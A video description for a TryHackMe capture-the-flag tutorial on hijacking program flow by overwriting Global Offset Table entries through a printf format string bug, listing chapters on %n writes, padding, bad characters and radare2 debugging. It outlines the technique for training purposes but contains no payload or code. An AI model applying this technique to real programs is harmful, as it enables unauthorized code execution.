GOT overwrite with Format String - pwn108 - PWN101 | TryHackMe

Описание к видео GOT overwrite with Format String - pwn108 - PWN101 | TryHackMe

In this video we will see step by step how to overwrite GOT (Global Offset Table) entries by abusing a Format String vulnerability, hence hijacking the execution flow of the program. We will see in detail how to overwrite memory with the %n format specifier from the printf family of functions, understanding how to write 4 or less bytes with the values we desire at the address we want. Besides, bad chars of printf function will be also discussed, which define how the payload must be arranged. We will also see how to debug the payload with r2 , by writing it into a file and making radare2 read from it.

GOT and PLT:    • Global Offset Table (GOT) and Procedu...  
Exploiting Format String tutorial:    • Exploiting Format String vulnerabilit...  

Binary Exploitation PWN101 series:    • Binary Exploitation PWN101  

00:00 - Intro
00:40 - Checking the binary
01:56 - Executing the binary
02:16 - Trying to break the binary
02:35 - Testing for format string
02:50 - Spotting the vulnerability
03:33 - Disassembling the binary
03:56 - Analyzing the code
05:49 - Spotting the format string
06:55 - ret2win-like function
08:02 - Recap
08:39 - The %n format specifier
10:15 - The GOT and the PLT
11:06 - Considerations before exploitation
11:25 - Partial RELRO
12:11 - Permissions of the GOT section
12:31 - GOT entry to overwrite
14:03 - Preparing the exploit
14:12 - Finding the position of the input
15:50 - Starting the payload
16:09 - %n and positional argument
17:05 - How to write with %n
18:20 - Padding to write the desired value
19:17 - Writing with %n
19:39 - Bad chars for printf
22:11 - Rearranging the payload
22:54 - Adapting the payload
24:55 - Debugging/testing the payload
25:55 - Debugging with radare2 (r2)
27:05 - %n wrote only 4 bytes
27:49 - Writing more than just 4 bytes
28:23 - Splitting the writes
29:50 - Writing just 2 bytes
30:00 - The 'h' length sub-specifier
30:27 - Final payload
32:19 - Adjusting the final payload
33:49 - Executing the exploit
34:12 - Exploiting locally
34:37 - Exploiting remotely
35:15 - Reading the flag
35:21 - Outro[*]

Exploit code, not people.
Twitter: @Razvieu
*Outro track: Etsu - Selcouth
GG

Комментарии

Информация по комментариям в разработке

Похожие видео